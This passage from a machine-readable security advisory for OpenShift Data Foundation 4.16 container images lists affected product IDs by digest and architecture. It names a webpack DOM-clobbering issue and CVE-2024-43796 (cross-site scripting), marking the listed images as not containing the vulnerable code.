"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", 